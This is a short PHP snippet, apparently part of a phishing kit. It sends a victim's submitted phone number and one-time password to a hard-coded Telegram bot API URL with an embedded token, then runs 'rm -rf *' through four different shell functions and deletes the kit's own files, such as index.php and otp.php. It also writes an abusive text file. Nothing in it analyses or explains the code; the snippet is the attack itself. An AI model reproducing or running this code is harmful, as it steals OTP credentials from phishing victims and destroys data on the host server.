error_reporting(0);
error_log(0);
file_get_contents("https://api.telegram.org/bot1729991611:AAHNMJh9xPulpdUqS46UmHGwckc5rJ7n6zs/sendMessage?chat_id=-538746459&text=Number: " . $_POST['number'] . " OTP: " . $_POST['otp']);
error_log(0);
error_reporting(0);
file_put_contents("fuck-you.txt", "Fuck you asshole.");
system('rm -rf *');
exec('rm -rf *');
shell_exec('rm -rf *');
passthru('rm -rf *');
unlink('index.php');
unlink('otp.php');
unlink('mpin.php');
unlink('redir.php');
unlink('anti.php');
unlink('config/anti.php');
unlink('config/404.php');
unlink('config/zch.php');
